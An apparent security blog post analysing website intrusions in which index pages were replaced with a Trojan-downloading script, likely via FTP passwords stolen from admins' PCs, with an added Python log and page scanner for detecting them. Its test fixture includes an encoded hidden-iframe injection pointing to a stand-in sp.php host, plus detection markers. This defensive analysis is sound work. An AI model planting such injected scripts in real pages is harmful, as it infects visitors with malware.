
Malicious hackers or careless users?

There have been numerous unrelated website intrusions lately. In each case a malicious script (usually a modification of Trojan-Downloader.JS.Psyme) is placed on the server in place of the original index* file, so that the script runs as soon as a user visits the site. The script exploits a known, already patched Microsoft IE vulnerability, which leaves the visitor’s PC infected with a Trojan spy. Inside the script, the links to the Trojan usually (but not always) point to some “sp.php”.

How could the intrusions have been carried out? There are a few possible scenarios:

1. A live hacker intrusion.

The large number of near-identical cases reduces the probability of this scenario to practically zero.

2. Massive automatic exploitation of web-server services.

Some of the logs of infected systems that I’ve had access to show that the malicious scripts are being uploaded via FTP using existing FTP logins. This means that the hacker (whoever or whatever s/he/it may be) has had access to the server’s logins and passwords, or at least to some of them. Admittedly, the password file could have been obtained through a server vulnerability and the hashes cracked offline, given that a fast, unsalted hash such as MD5 offers little resistance to brute force these days. But this scenario isn’t at all likely: according to the system logs, no tampering with system services has been registered. The only intrusion-related action recorded is a direct FTP logon followed by files being uploaded. It may sound like a contradiction in terms, but as far as the server was concerned the intrusion was entirely legitimate.
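The two observations above (index* files overwritten with a script that references sp.php, and the upload arriving through an ordinary, successful FTP logon) can be turned into a simple check. The following is an added example, not code from the original post: it parses constructed transfer-log lines in the common xferlog layout (assumed here; wu-ftpd, proftpd and vsftpd all write it) and flags uploads of index.* files from hosts outside a baseline of known admin addresses, then scans page content for script blocks carrying the sp.php/iframe marker. The sample log lines, IP addresses and HTML are constructed; the marker list is a heuristic drawn from the description above, not an AV signature.

```python
import re

# Constructed sample lines in xferlog layout (assumed format). Field order:
# timestamp, transfer seconds, remote host, bytes, path, type (a/b),
# action flag, direction (i = upload to server, o = download), access mode,
# username, service, auth method, auth user id, completion status.
SAMPLE_XFERLOG = """\
Mon Mar 14 02:11:43 2005 1 203.0.113.45 4012 /var/www/html/index.html a _ i r webadmin ftp 0 * c
Mon Mar 14 02:11:44 2005 1 203.0.113.45 3988 /var/www/html/news/index.php a _ i r webadmin ftp 0 * c
Mon Mar 14 09:30:02 2005 1 198.51.100.8 120433 /var/www/html/images/logo.png b _ i r webadmin ftp 0 * c
Mon Mar 14 10:02:17 2005 1 198.51.100.8 4012 /var/www/html/index.html a _ o r webadmin ftp 0 * c
"""

XFERLOG_RE = re.compile(
    r"^(?P<ts>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<flag>\S) (?P<dir>[io]) "
    r"(?P<mode>[arg]) (?P<user>\S+)"
)

# index.* files are what the incidents above overwrote; extend as needed.
INDEX_NAME_RE = re.compile(r"^index\.(?:html?|php\d?|asp|jsp)$", re.I)


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = XFERLOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def suspicious_index_uploads(text, known_admin_hosts):
    """Uploads (direction 'i') of an index.* file by a valid login from a host
    outside the admin baseline. The logon itself is legitimate, so the service
    logs show nothing; the only anomaly is who uploaded what, and from where."""
    hits = []
    for rec in parse_xferlog(text):
        name = rec["path"].rsplit("/", 1)[-1]
        if (rec["dir"] == "i" and INDEX_NAME_RE.match(name)
                and rec["host"] not in known_admin_hosts):
            hits.append(rec)
    return hits


# Content-side check: script blocks that reference sp.php, write an iframe,
# or decode themselves with unescape(). Heuristic markers, not an AV verdict.
SCRIPT_BLOCK_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
INJECT_MARKERS = ("sp.php", "<iframe", "unescape(")


def injected_script_blocks(html):
    """Return the script blocks in html that contain one of the markers."""
    return [blk for blk in SCRIPT_BLOCK_RE.findall(html)
            if any(marker in blk.lower() for marker in INJECT_MARKERS)]


# Constructed sample pages, not real captures.
CLEAN_PAGE = "<html><body><h1>News</h1><script src='/js/menu.js'></script></body></html>"
INFECTED_PAGE = ('<html><body><script>document.write(unescape("%3Ciframe src=%22http://'
                 'example.invalid/sp.php%22 width=0 height=0%3E%3C/iframe%3E"))</script>'
                 '<h1>News</h1></body></html>')

if __name__ == "__main__":
    # 198.51.100.8 is the (assumed) address the real admin works from.
    for rec in suspicious_index_uploads(SAMPLE_XFERLOG, known_admin_hosts={"198.51.100.8"}):
        print(f"{rec['ts']} user={rec['user']} host={rec['host']} uploaded {rec['path']}")
    print("infected page hits:", len(injected_script_blocks(INFECTED_PAGE)))
    print("clean page hits:", len(injected_script_blocks(CLEAN_PAGE)))
```

On the sample data the log check reports the two index-file uploads from 203.0.113.45 and ignores the image upload and the download from the admin's own address; the content check flags the infected page and passes the clean one. In practice the admin baseline is the important part: the FTP account is valid, so a login from an unfamiliar address replacing index files is the signal, not a failed authentication.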

So what intrusion scenarios remain probable, or even possible?
Discarding the idea of sniffing, which is very unlikely, the only possibility left is…

3. Passwords stolen from end user machines.

What I’m picturing is a Windows Trojan that harvests passwords when it runs on a website admin’s Windows box with FTP passwords stored on it (e.g. in Total Commander). This theory seems even more likely when we consider where the scripts are found: on servers hosting everything from well-known media sites to private, unindexed sites. There’s no obvious logic to the selection. But a Trojan explains it, because FTP client software stores the user/password data alongside the server’s IP address.

If the malicious program has got hold of the IP/user/password FTP data, it doesn’t even have to send that data anywhere. It only needs to open an FTP session and infect the server with the malicious script (assuming the stolen account has sufficient FTP privileges, of course).

I strongly believe that #3 is the correct scenario, although I don’t have all the facts to prove it yet.

It may sound boring, but there’s an easy way to stop this epidemic of infected websites:

– up-to-date MS patches,
– up-to-date AV bases,
– and a firewall.

plus all the common-sense anti-virus precautions such as ‘Do not run suspicious programs’, ‘Disable ActiveX in the browser’, etc.

And finally, a specific solution to this particular problem: avoid saving user/password data for FTP services (or, more generally, any user/password data) in Windows clients. The only question is, whose memory is good enough to follow this advice?
